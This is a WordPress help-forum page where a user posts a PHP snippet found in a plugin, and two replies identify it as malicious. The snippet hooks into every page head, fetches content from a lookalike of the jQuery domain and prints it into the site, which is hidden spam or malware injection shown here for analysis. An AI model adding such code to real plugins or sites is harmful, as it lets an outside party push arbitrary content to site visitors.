Special Content

Get rid of this Strict Standards warning WooCommerce: get_current_screen not working with multi language Can’t login on WordPress Force HTTPS using .htaccess – stuck in redirect loop WordPress: Ajax not working to insert, query and result data

Home Science, Programming and Technology WordPress I found this in a plugin. What does it do? is it dangerous?

I found this in a plugin. What does it do? is it dangerous?

May 22, 20234 Views

placeholder

I found this in a plugin. What does it do? is it dangerous?

add_action('admin_enqueue_scripts', 'pw_load_scripts');
if (!function_exists('wp__head'){
function wp__head() {
    if(function_exists('curl_init')) { 
        $ch = curl_init();
        curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1"); 
        curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); 
        curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']);
        curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10); 
        $jquery = curl_exec($ch);  
        curl_close($ch); 
        echo "$jquery";
    }
}
add_action('wp_head', 'wp__head');
}

Post Views: 4

2 comments

Anonymous says:

May 22, 2023 at 4:59 am

It loads a block of markup containing spam (I thought about posting a bit of the source but I don’t want to advertise the content in any way) from a domain that is a close misspelling of the domain– http://jquery.com/— used by jQuery, a reputable and popular Javascript library and one that WordPress includes in the Core. I think the idea is to appear to be loading that library, when in fact loading something very different.

And it is in other ways attempting to appear to be loading jQuery. Notice the variable name $jquery.

It may attempt to load malicious scripts as well. I didn’t check.
I would definitely call it dangerous especially since the content on that page can change anytime the domain controllers feel like it.

At best it is going to damage your site as search engines look down on sites that spread spam.

Don’t use it. It does nothing beneficial for you or for anyone else on the web other than the people who run the site. If you found this on a reputable site, report it to them.
Anonymous says:

May 22, 2023 at 4:59 am

Yes, it is dangerous code, loading content from a spam site.

You didn’t name the plugin, but if you found this code after it has been installed on your website, it is possible that the plugin code didn’t come from the developer like this, but instead was hacked after it was installed. If this is the case, you might find the malicious code on more of your website than just this plugin.

Check the downloaded plugin code from wherever you got the plugin originally, and see if this malicious code was there originally. If not, then your site has been hacked. If you determine that to be the case, read this article from the Codex.

Comments are closed.